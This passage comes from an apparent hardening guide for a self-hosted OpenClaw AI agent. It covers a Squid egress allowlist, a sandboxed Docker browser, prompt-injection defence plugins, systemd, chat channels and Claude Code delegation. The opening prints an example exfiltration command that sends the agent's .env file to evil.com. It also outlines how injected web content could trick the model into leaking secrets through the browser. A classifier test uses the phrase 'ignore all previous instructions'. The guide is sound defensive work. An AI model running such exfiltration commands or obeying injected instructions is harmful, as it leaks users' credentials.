<p><strong>What this protects against:</strong> Without split architecture, a prompt injection can run <code class="language-plaintext highlighter-rouge">curl https://evil.com -d "$(cat ~/.openclaw/.env)"</code> and your API keys are gone. With split architecture, the gateway process can only reach allowlisted domains — the <code class="language-plaintext highlighter-rouge">curl</code> returns a proxy error. The browser can reach <code class="language-plaintext highlighter-rouge">evil.com</code>, but it has no access to <code class="language-plaintext highlighter-rouge">.env</code>, no environment variables, nothing to steal.</p>

<p><strong>The remaining risk:</strong> The LLM could be tricked into typing a secret into the browser via CDP — navigating to a malicious URL with a secret in a query parameter, or using <code class="language-plaintext highlighter-rouge">Runtime.evaluate</code> to execute a <code class="language-plaintext highlighter-rouge">fetch()</code> call. This requires the LLM to actively cooperate with the attack and to have the secret in its current context window. It’s a real but significantly narrower attack surface.</p>

<h3 id="maintaining-the-allowlist">Maintaining the allowlist</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Add a new domain</span>
<span class="nb">echo</span> <span class="s2">".newservice.com"</span> | <span class="nb">sudo tee</span> <span class="nt">-a</span> /etc/squid/allowed_domains.txt
<span class="nb">sudo </span>systemctl reload squid

<span class="c"># Find what's being blocked (useful when wiring up a new integration)</span>
<span class="nb">sudo tail</span> <span class="nt">-f</span> /var/log/squid/access.log | <span class="nb">grep </span>DENIED
</code></pre></div></div>

<hr />

<h2 id="12-set-up-browser-automation-dockerized-sandbox">12. Set Up Browser Automation (Dockerized Sandbox)</h2>

<p>OpenClaw controls browsers via the Chrome DevTools Protocol. We run the browser in a separate Docker container rather than on the host — critical for the split egress architecture above.</p>

<h3 id="install-docker">Install Docker</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>apt <span class="nb">install</span> <span class="nt">-y</span> docker.io docker-compose-v2
<span class="nb">sudo </span>systemctl <span class="nb">enable </span>docker
<span class="nb">sudo </span>usermod <span class="nt">-aG</span> docker openclaw
</code></pre></div></div>

<h3 id="run-the-sandbox-browser-container">Run the sandbox browser container</h3>

<p><strong>Option A: Host networking</strong> — Use if you want OpenClaw to browse locally running dev servers (e.g., <code class="language-plaintext highlighter-rouge">localhost:3000</code>). The container shares the host’s network stack.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker run <span class="nt">-d</span> <span class="se">\</span>
  <span class="nt">--name</span> openclaw-browser <span class="se">\</span>
  <span class="nt">--network</span> host <span class="se">\</span>
  <span class="nt">--restart</span> unless-stopped <span class="se">\</span>
  <span class="nt">-e</span> <span class="nv">OPENCLAW_BROWSER_HEADLESS</span><span class="o">=</span>1 <span class="se">\</span>
  ghcr.io/canyugs/openclaw-sandbox-browser:main
</code></pre></div></div>

<p><strong>Option B: Bridge networking</strong> — Slightly more isolation, but the container cannot reach services on <code class="language-plaintext highlighter-rouge">localhost</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker run <span class="nt">-d</span> <span class="se">\</span>
  <span class="nt">--name</span> openclaw-browser <span class="se">\</span>
  <span class="nt">--restart</span> unless-stopped <span class="se">\</span>
  <span class="nt">-p</span> 127.0.0.1:9222:9222 <span class="se">\</span>
  <span class="nt">-e</span> <span class="nv">OPENCLAW_BROWSER_HEADLESS</span><span class="o">=</span>1 <span class="se">\</span>
  ghcr.io/canyugs/openclaw-sandbox-browser:main
</code></pre></div></div>

<p>Both options preserve filesystem and process isolation — the container can’t read host files or kill host processes either way. If this is a single-purpose server, host networking is fine and more convenient.</p>

<h3 id="configure-openclaw-to-use-the-container">Configure OpenClaw to use the container</h3>

<p>Chrome inside Docker reports WebSocket URLs without the port. The fix is to use a direct <code class="language-plaintext highlighter-rouge">ws://</code> URL which skips the discovery step:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Get the full WebSocket URL</span>
curl <span class="nt">-s</span> http://127.0.0.1:9222/json/version | python3 <span class="nt">-c</span> <span class="s2">"
import sys, json
url = json.load(sys.stdin)['webSocketDebuggerUrl']
print(url.replace('ws://127.0.0.1/', 'ws://127.0.0.1:9222/'))
"</span>
</code></pre></div></div>

<p>Use that URL in <code class="language-plaintext highlighter-rouge">openclaw.json</code>:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"browser"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"enabled"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
    </span><span class="nl">"attachOnly"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
    </span><span class="nl">"defaultProfile"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sandbox"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"profiles"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"sandbox"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
        </span><span class="nl">"cdpUrl"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ws://127.0.0.1:9222/devtools/browser/&lt;ID_FROM_ABOVE&gt;"</span><span class="p">,</span><span class="w">
        </span><span class="nl">"color"</span><span class="p">:</span><span class="w"> </span><span class="s2">"#FF4500"</span><span class="w">
      </span><span class="p">}</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p><strong>The browser ID changes on every container restart.</strong> Use this helper to auto-update the config:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat</span> <span class="o">&gt;</span> ~/.openclaw/update-browser-cdp.sh <span class="o">&lt;&lt;</span> <span class="sh">'</span><span class="no">SCRIPT</span><span class="sh">'
#!/bin/bash
WS_URL=</span><span class="si">$(</span>curl <span class="nt">-s</span> http://127.0.0.1:9222/json/version | python3 <span class="nt">-c</span> <span class="s2">"
import sys, json
url = json.load(sys.stdin)['webSocketDebuggerUrl']
print(url.replace('ws://127.0.0.1/', 'ws://127.0.0.1:9222/'))
"</span><span class="si">)</span><span class="sh">

if [ -z "</span><span class="nv">$WS_URL</span><span class="sh">" ]; then
  echo "ERROR: Could not reach CDP on port 9222. Is the container running?"
  exit 1
fi

python3 -c "
import json
with open('</span><span class="nv">$HOME</span><span class="sh">/.openclaw/openclaw.json') as f:
    config = json.load(f)
config['browser']['profiles']['sandbox']['cdpUrl'] = '</span><span class="nv">$WS_URL</span><span class="sh">'
with open('</span><span class="nv">$HOME</span><span class="sh">/.openclaw/openclaw.json', 'w') as f:
    json.dump(config, f, indent=2)
print('Updated cdpUrl to: </span><span class="nv">$WS_URL</span><span class="sh">')
"
</span><span class="no">SCRIPT
</span><span class="nb">chmod</span> +x ~/.openclaw/update-browser-cdp.sh
</code></pre></div></div>

<p>Run after every container restart: <code class="language-plaintext highlighter-rouge">~/.openclaw/update-browser-cdp.sh</code></p>

<h3 id="fix-snapshotscreenshot-with-bridge-networking-iptables-port-redirect">Fix snapshot/screenshot with bridge networking (iptables port redirect)</h3>

<p>If you chose Option B (bridge networking), some OpenClaw operations perform fresh CDP discovery via <code class="language-plaintext highlighter-rouge">/json/version</code> and use Chrome’s self-reported portless WebSocket URL, causing <code class="language-plaintext highlighter-rouge">ECONNREFUSED 127.0.0.1:80</code> errors.</p>

<p>Fix with an iptables rule that redirects port 80 to 9222:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>iptables <span class="nt">-t</span> nat <span class="nt">-A</span> OUTPUT <span class="nt">-p</span> tcp <span class="nt">-d</span> 127.0.0.1 <span class="nt">--dport</span> 80 <span class="nt">-j</span> REDIRECT <span class="nt">--to-port</span> 9222

<span class="c"># Persist across reboots</span>
<span class="nb">sudo </span>apt <span class="nb">install</span> <span class="nt">-y</span> iptables-persistent
<span class="nb">sudo </span>netfilter-persistent save
</code></pre></div></div>

<h3 id="install-playwright-on-the-gateway-side">Install Playwright on the gateway side</h3>

<p>Some advanced features require Playwright alongside the gateway, even when using a remote browser:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> <span class="nt">-i</span> <span class="nt">-u</span> openclaw
npm <span class="nb">install </span>playwright  <span class="c"># Not playwright-core</span>
</code></pre></div></div>

<hr />

<h2 id="13-agent-security-plugins">13. Agent Security Plugins</h2>

<p>The egress proxy prevents the gateway from reaching unauthorized domains. The browser sandbox isolates browsing from host secrets. Neither protects against prompt injection at the content layer — a malicious webpage or email could contain hidden instructions that trick the LLM into misusing its legitimate tools.</p>

<p>Two complementary plugins address this:</p>

<table>
  <thead>
    <tr>
      <th>Plugin</th>
      <th>What it does</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><strong>SecureClaw</strong> (Adversa AI)</td>
      <td>15 behavioral rules injected into the agent’s system prompt, plus config hardening scripts and cognitive file integrity monitoring</td>
    </tr>
    <tr>
      <td><strong>openclaw-defender</strong></td>
      <td>Runtime interception — regex pattern scanning on tool args/results, ML-based injection classification (DeBERTa), credential leak detection on outgoing messages</td>
    </tr>
  </tbody>
</table>

<p>SecureClaw tells the LLM what to watch for. openclaw-defender intercepts content before it reaches the LLM (and before output leaves). Together they cover both sides.</p>

<p><img src="/pr-preview/pr-12/assets/images/generated/openclaw-setup-guide-security-layers.jpeg" alt="Four geological strata — each layer finer-grained than the last, expressing depth of defense without a single label" /></p>

<h3 id="install-secureclaw">Install SecureClaw</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>npm <span class="nb">install</span> @adversa/secureclaw
npx openclaw plugins <span class="nb">install</span> <span class="nt">-l</span> node_modules/@adversa/secureclaw
npx openclaw secureclaw skill <span class="nb">install</span>

<span class="c"># Run the initial audit and hardening</span>
bash ~/.openclaw/skills/secureclaw/scripts/quick-audit.sh
bash ~/.openclaw/skills/secureclaw/scripts/quick-harden.sh

<span class="c"># Fix .env permissions if flagged</span>
<span class="nb">chmod </span>600 ~/.openclaw/.env
</code></pre></div></div>

<h3 id="install-openclaw-defender">Install openclaw-defender</h3>

<p>The published npm package (v0.3.0) has bugs that prevent it from working with OpenClaw. Install from the fork that includes the fixes (PRs <a href="https://github.com/nyosegawa/openclaw-defender/pull/1">#1</a> and <a href="https://github.com/nyosegawa/openclaw-defender/pull/2">#2</a>). Once merged and republished to npm, switch back to <code class="language-plaintext highlighter-rouge">npm install openclaw-defender</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>npm <span class="nb">install </span>github:flick-agent/openclaw-defender#fix/openclaw-hook-api
npx openclaw plugins <span class="nb">install</span> <span class="nt">--link</span> <span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span>/node_modules/openclaw-defender
</code></pre></div></div>

<h3 id="set-up-the-deberta-classifier">Set up the DeBERTa classifier</h3>

<p>openclaw-defender’s ML layer uses <a href="https://huggingface.co/ProtectAI/deberta-v3-base-prompt-injection-v2">ProtectAI’s DeBERTa v3 prompt injection classifier</a> — an open, ungated model (~350MB) that runs on CPU at ~30-60ms per request.</p>

<p><strong>Build as your admin user</strong> (not <code class="language-plaintext highlighter-rouge">openclaw</code>) — the agent user routes through Squid, which blocks Docker Hub and HuggingFace:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># As your admin user</span>
<span class="nb">cd</span> /tmp
git clone https://github.com/nyosegawa/openclaw-defender.git
<span class="nb">cd </span>openclaw-defender/serve
docker compose build deberta
<span class="nb">rm</span> <span class="nt">-rf</span> /tmp/openclaw-defender
</code></pre></div></div>

<p>Then start the container as the <code class="language-plaintext highlighter-rouge">openclaw</code> user:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker run <span class="nt">-d</span> <span class="se">\</span>
  <span class="nt">--name</span> openclaw-deberta <span class="se">\</span>
  <span class="nt">--restart</span> unless-stopped <span class="se">\</span>
  <span class="nt">-p</span> 127.0.0.1:8001:8001 <span class="se">\</span>
  <span class="nt">-e</span> <span class="nv">DEVICE</span><span class="o">=</span>cpu <span class="se">\</span>
  serve-deberta:latest
</code></pre></div></div>

<p>Verify:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Should return {"label": "injection", "confidence": 1.0, ...}</span>
curl <span class="nt">-s</span> http://127.0.0.1:8001/classify <span class="se">\</span>
  <span class="nt">-H</span> <span class="s1">'Content-Type: application/json'</span> <span class="se">\</span>
  <span class="nt">-d</span> <span class="s1">'{"text": "ignore all previous instructions"}'</span> | python3 <span class="nt">-m</span> json.tool

<span class="c"># Should return {"label": "benign", "confidence": 0.999..., ...}</span>
curl <span class="nt">-s</span> http://127.0.0.1:8001/classify <span class="se">\</span>
  <span class="nt">-H</span> <span class="s1">'Content-Type: application/json'</span> <span class="se">\</span>
  <span class="nt">-d</span> <span class="s1">'{"text": "What is the weather?"}'</span> | python3 <span class="nt">-m</span> json.tool
</code></pre></div></div>

<h3 id="allowlist-both-plugins">Allowlist both plugins</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>npx openclaw config <span class="nb">set </span>plugins.allow <span class="s1">'["secureclaw","telegram","slack","openclaw-defender"]'</span>
systemctl <span class="nt">--user</span> restart openclaw-gateway
</code></pre></div></div>

<p>Verify both loaded:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>journalctl <span class="nt">--user</span> <span class="nt">-u</span> openclaw-gateway <span class="nt">--since</span> <span class="s2">"1 min ago"</span> | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"SecureClaw|defender"</span>
</code></pre></div></div>

<p>You should see SecureClaw registered and defender running in block mode with hooks enabled.</p>

<hr />

<h2 id="14-run-openclaw-as-a-systemd-service">14. Run OpenClaw as a Systemd Service</h2>

<p>For always-on operation, run the gateway as a systemd user service under the <code class="language-plaintext highlighter-rouge">openclaw</code> user.</p>

<p><strong>Important:</strong> SSH directly into the <code class="language-plaintext highlighter-rouge">openclaw</code> user — don’t use <code class="language-plaintext highlighter-rouge">sudo -i -u openclaw</code>. <code class="language-plaintext highlighter-rouge">sudo -i</code> doesn’t create the PAM login session needed for the user bus.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Copy admin user's authorized_keys to openclaw (as admin)</span>
<span class="nb">sudo mkdir</span> <span class="nt">-p</span> /home/openclaw/.ssh
<span class="nb">sudo cp</span> ~/.ssh/authorized_keys /home/openclaw/.ssh/
<span class="nb">sudo chown</span> <span class="nt">-R</span> openclaw:openclaw /home/openclaw/.ssh
<span class="nb">sudo chmod </span>700 /home/openclaw/.ssh
<span class="nb">sudo chmod </span>600 /home/openclaw/.ssh/authorized_keys

<span class="c"># Enable lingering (as admin)</span>
<span class="nb">sudo </span>loginctl enable-linger openclaw
</code></pre></div></div>

<p><strong>Create the service file</strong> (as openclaw, via direct SSH):</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkdir</span> <span class="nt">-p</span> ~/.config/systemd/user/

<span class="nb">cat</span> <span class="o">&gt;</span> ~/.config/systemd/user/openclaw-gateway.service <span class="o">&lt;&lt;</span> <span class="sh">'</span><span class="no">EOF</span><span class="sh">'
[Unit]
Description=OpenClaw Gateway
After=network-online.target
Wants=network-online.target

[Service]
ExecStart=/bin/bash -c 'source /home/openclaw/.op_token &amp;&amp; /usr/local/bin/op run --env-file=/home/openclaw/.openclaw/.env -- /home/openclaw/.nvm/versions/node/v22.22.1/bin/node /home/openclaw/.nvm/versions/node/v22.22.1/lib/node_modules/openclaw/dist/index.js gateway --port 18789'
Restart=always
RestartSec=5
TimeoutStopSec=30
TimeoutStartSec=30
SuccessExitStatus=0 143
KillMode=control-group
Environment=HOME=/home/openclaw
Environment=TMPDIR=/tmp
Environment=GOG_ACCOUNT=yourname.agent@gmail.com
Environment=PATH=/home/openclaw/.nvm/current/bin:/home/openclaw/.local/bin:/home/openclaw/.npm-global/bin:/home/openclaw/bin:/usr/local/bin:/usr/bin:/bin

[Install]
WantedBy=default.target
</span><span class="no">EOF
</span></code></pre></div></div>

<p>Notes on the service file:</p>
<ul>
  <li>Uses <code class="language-plaintext highlighter-rouge">source ~/.op_token</code> to load <code class="language-plaintext highlighter-rouge">OP_SERVICE_ACCOUNT_TOKEN</code> — not a plaintext <code class="language-plaintext highlighter-rouge">Environment=</code> line.</li>
  <li>Full absolute paths to <code class="language-plaintext highlighter-rouge">op</code>, <code class="language-plaintext highlighter-rouge">node</code>, and the OpenClaw entrypoint — no reliance on <code class="language-plaintext highlighter-rouge">nvm.sh</code> or shell PATH.</li>
  <li><code class="language-plaintext highlighter-rouge">GOG_KEYRING_PASSWORD</code> is NOT here — it’s injected via <code class="language-plaintext highlighter-rouge">op run</code>.</li>
  <li><code class="language-plaintext highlighter-rouge">HTTP_PROXY</code>/<code class="language-plaintext highlighter-rouge">HTTPS_PROXY</code> go here after completing Section 11. Do not add them before — they’ll prevent the gateway from reaching 1Password and cause a crash loop.</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>systemctl <span class="nt">--user</span> daemon-reload
systemctl <span class="nt">--user</span> <span class="nb">enable </span>openclaw-gateway
systemctl <span class="nt">--user</span> start openclaw-gateway
systemctl <span class="nt">--user</span> status openclaw-gateway
journalctl <span class="nt">--user</span> <span class="nt">-u</span> openclaw-gateway <span class="nt">-f</span>
</code></pre></div></div>

<h3 id="expose-via-tailscale">Expose via Tailscale</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>tailscale serve <span class="nt">--bg</span> 18789
</code></pre></div></div>

<hr />

<h2 id="15-connect-messaging-channels">15. Connect Messaging Channels</h2>

<h3 id="webchat">WebChat</h3>

<p>WebChat runs directly on the Gateway — no third-party servers involved.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>tailscale serve <span class="nt">--bg</span> 18789
</code></pre></div></div>

<p>Access from any device on your tailnet at <code class="language-plaintext highlighter-rouge">https://openclaw-server.&lt;tailnet-name&gt;.ts.net</code>.</p>

<p>Add to <code class="language-plaintext highlighter-rouge">openclaw.json</code>:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"gateway"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"trustedProxies"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"127.0.0.1"</span><span class="p">,</span><span class="w"> </span><span class="s2">"100.0.0.0/8"</span><span class="p">],</span><span class="w">
    </span><span class="nl">"controlUi"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"allowedOrigins"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"https://openclaw-server.&lt;tailnet-name&gt;.ts.net"</span><span class="p">]</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p><strong>First-time device pairing:</strong> The gateway requires one-time approval for each new browser/device. On first connection you’ll see “pairing required.”</p>

<ol>
  <li>Temporarily add <code class="language-plaintext highlighter-rouge">"dangerouslyDisableDeviceAuth": true</code> to the <code class="language-plaintext highlighter-rouge">controlUi</code> block.</li>
  <li>Restart the gateway, open the dashboard, enter your gateway token.</li>
  <li>Remove <code class="language-plaintext highlighter-rouge">dangerouslyDisableDeviceAuth</code> and restart. Your browser stays paired.</li>
</ol>

<p>To pair additional devices: <code class="language-plaintext highlighter-rouge">openclaw devices approve &lt;requestId&gt;</code> from a device that’s already connected.</p>

<h3 id="telegram">Telegram</h3>

<p>Add to <code class="language-plaintext highlighter-rouge">openclaw.json</code>:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"channels"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"telegram"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"enabled"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
      </span><span class="nl">"dmPolicy"</span><span class="p">:</span><span class="w"> </span><span class="s2">"allowlist"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"allowFrom"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"YOUR_NUMERIC_USER_ID"</span><span class="p">]</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p><strong>Connect and pair:</strong></p>

<ol>
  <li>Restart the gateway.</li>
  <li>Open Telegram and send a message to your bot.</li>
  <li>The bot sends you a pairing code. On the server: <code class="language-plaintext highlighter-rouge">openclaw pairing approve telegram &lt;CODE&gt;</code></li>
</ol>

<p>The <code class="language-plaintext highlighter-rouge">allowFrom</code> allowlist is not optional — without it, anyone who finds your bot’s @username can message it.</p>

<h3 id="slack">Slack</h3>

<p><strong>Note</strong> I highly recommend Slack as your primary channel. The thread:session setup is very nice for keeping context isolated and running tasks in parallel.</p>

<ol>
  <li>Go to api.slack.com/apps → “Create New App” → “From scratch.”</li>
  <li>Enable Socket Mode: Settings → Socket Mode → Toggle ON. Create an App Token with <code class="language-plaintext highlighter-rouge">connections:write</code> scope.</li>
  <li>Add Bot Scopes: <code class="language-plaintext highlighter-rouge">chat:write</code>, <code class="language-plaintext highlighter-rouge">channels:history</code>, <code class="language-plaintext highlighter-rouge">im:history</code>, <code class="language-plaintext highlighter-rouge">im:write</code>, <code class="language-plaintext highlighter-rouge">app_mentions:read</code>, <code class="language-plaintext highlighter-rouge">assistant:write</code>, <code class="language-plaintext highlighter-rouge">files:read</code>, <code class="language-plaintext highlighter-rouge">files:write</code> (and others as needed).</li>
  <li>Subscribe to Events: <code class="language-plaintext highlighter-rouge">app_mention</code>, <code class="language-plaintext highlighter-rouge">message.channels</code>, <code class="language-plaintext highlighter-rouge">message.groups</code>, <code class="language-plaintext highlighter-rouge">message.im</code>.</li>
  <li>Install to Workspace. Copy the Bot Token (<code class="language-plaintext highlighter-rouge">xoxb-...</code>).</li>
</ol>

<p>Store both tokens in 1Password and add to <code class="language-plaintext highlighter-rouge">~/.openclaw/.env</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SLACK_BOT_TOKEN=op://OpenClaw/SLACK_BOT_TOKEN/credential
SLACK_APP_TOKEN=op://OpenClaw/SLACK_APP_TOKEN/credential
</code></pre></div></div>

<p>Add to <code class="language-plaintext highlighter-rouge">openclaw.json</code>:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"channels"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"slack"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"enabled"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
      </span><span class="nl">"mode"</span><span class="p">:</span><span class="w"> </span><span class="s2">"socket"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"dmPolicy"</span><span class="p">:</span><span class="w"> </span><span class="s2">"allowlist"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"allowFrom"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"YOUR_SLACK_USER_ID"</span><span class="p">],</span><span class="w">
      </span><span class="nl">"requireMention"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
      </span><span class="nl">"replyToModeByChatType"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"channel"</span><span class="p">:</span><span class="w"> </span><span class="s2">"first"</span><span class="w"> </span><span class="p">},</span><span class="w">
      </span><span class="nl">"ackReaction"</span><span class="p">:</span><span class="w"> </span><span class="s2">"agent"</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>Pair: restart the gateway, DM the bot, get the pairing code, then <code class="language-plaintext highlighter-rouge">openclaw pairing approve slack &lt;CODE&gt;</code>.</p>

<h3 id="multi-channel-strategy">Multi-channel strategy</h3>

<p>Run WebChat as your primary (fastest, lowest latency) and Telegram as your mobile channel. With <code class="language-plaintext highlighter-rouge">dmScope</code> set to <code class="language-plaintext highlighter-rouge">"main"</code> (default), messages from both share the same session context — start a conversation on your phone, continue it at your desk.</p>

<p>On SMS: don’t use it for primary interaction. Messages are unencrypted in transit, stored in plaintext on carrier servers, and vulnerable to SIM swapping. If you add SMS later (via Twilio), use it only for outbound alerts — not for sending commands that include sensitive context.</p>

<hr />

<h2 id="16-session-management--memory">16. Session Management &amp; Memory</h2>

<ul>
  <li>Sessions are scoped to <strong>user + channel + agent</strong></li>
  <li>Full transcripts stored as JSONL: <code class="language-plaintext highlighter-rouge">~/.openclaw/agents/&lt;agentId&gt;/sessions/&lt;session-id&gt;.jsonl</code></li>
  <li>Sessions rotate at 4:00 AM by default. Manual: <code class="language-plaintext highlighter-rouge">/new</code> or <code class="language-plaintext highlighter-rouge">/reset</code> in chat.</li>
  <li><code class="language-plaintext highlighter-rouge">MEMORY.md</code> survives across sessions. Auto-compaction writes important facts from long conversations into <code class="language-plaintext highlighter-rouge">MEMORY.md</code> before summarizing older messages.</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openclaw sessions list              <span class="c"># See all active sessions</span>
openclaw sessions view &lt;session-id&gt; <span class="c"># Full message history</span>
</code></pre></div></div>

<p><strong>Cost tracking per session:</strong></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Total cost for a session</span>
jq <span class="nt">-r</span> <span class="s1">'select(.message.usage.cost.total) | .message.usage.cost.total'</span> <span class="se">\</span>
  ~/.openclaw/agents/&lt;agentId&gt;/sessions/&lt;session-id&gt;.jsonl <span class="se">\</span>
  | <span class="nb">paste</span> <span class="nt">-sd</span>+ | bc

<span class="c"># Daily cost summary across all sessions</span>
<span class="k">for </span>f <span class="k">in</span> ~/.openclaw/agents/&lt;agentId&gt;/sessions/<span class="k">*</span>.jsonl<span class="p">;</span> <span class="k">do
  </span><span class="nb">date</span><span class="o">=</span><span class="si">$(</span><span class="nb">head</span> <span class="nt">-1</span> <span class="s2">"</span><span class="nv">$f</span><span class="s2">"</span> | jq <span class="nt">-r</span> <span class="s1">'.timestamp'</span> | <span class="nb">cut</span> <span class="nt">-dT</span> <span class="nt">-f1</span><span class="si">)</span>
  <span class="nv">cost</span><span class="o">=</span><span class="si">$(</span>jq <span class="nt">-r</span> <span class="s1">'select(.message.usage.cost.total) | .message.usage.cost.total'</span> <span class="s2">"</span><span class="nv">$f</span><span class="s2">"</span> <span class="se">\</span>
    | <span class="nb">paste</span> <span class="nt">-sd</span>+ | bc 2&gt;/dev/null <span class="o">||</span> <span class="nb">echo </span>0<span class="si">)</span>
  <span class="nb">echo</span> <span class="s2">"</span><span class="nv">$date</span><span class="s2"> </span><span class="nv">$cost</span><span class="s2"> </span><span class="si">$(</span><span class="nb">basename</span> <span class="nv">$f</span><span class="si">)</span><span class="s2">"</span>
<span class="k">done</span> | <span class="nb">sort</span> <span class="nt">-r</span>
</code></pre></div></div>

<hr />

<h2 id="17-claude-code-delegation-via-acpx">17. Claude Code Delegation via ACPX</h2>

<p>One of the more powerful things OpenClaw can do is delegate coding tasks to Claude Code as a subagent. Rather than OpenClaw trying to run code itself, it hands off structured coding prompts to Claude Code and waits for results — using <a href="https://github.com/openclaw/acpx">ACPX</a>, a headless CLI client for the Agent Client Protocol (ACP).</p>

<p>The practical upside: you can authenticate Claude Code with your Claude.ai subscription (no separate API key needed for the coding agent), and OpenClaw can queue, run, and inspect Claude Code sessions programmatically.</p>

<h3 id="install-claude-code-on-the-server">Install Claude Code on the server</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># As the openclaw user</span>
npm <span class="nb">install</span> <span class="nt">-g</span> @anthropic-ai/claude-code@latest

<span class="c"># Authenticate with your Claude.ai subscription</span>
claude login
<span class="c"># Follow the browser auth flow via SSH tunnel if needed (same approach as gogcli in Section 7)</span>
</code></pre></div></div>

<p>Claude Code’s auth token is stored in <code class="language-plaintext highlighter-rouge">~/.claude/</code>. It survives server restarts and does not require a running browser session.</p>

<h3 id="install-acpx">Install ACPX</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>npm <span class="nb">install</span> <span class="nt">-g</span> acpx@latest

<span class="c"># Verify</span>
acpx <span class="nt">--version</span>

<span class="c"># Initialize global config</span>
acpx config init
</code></pre></div></div>

<p>Session state lives in <code class="language-plaintext highlighter-rouge">~/.acpx/</code>. No additional daemon is required.</p>

<h3 id="install-the-acpx-skill-into-openclaw">Install the ACPX skill into OpenClaw</h3>

<p>This gives OpenClaw the SKILL.md reference it needs to know how to invoke ACPX correctly:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>npx acpx@latest <span class="nt">--skill</span> <span class="nb">install </span>acpx
</code></pre></div></div>

<h3 id="configure-acpx-to-use-the-local-openclaw-gateway">Configure ACPX to use the local OpenClaw gateway</h3>

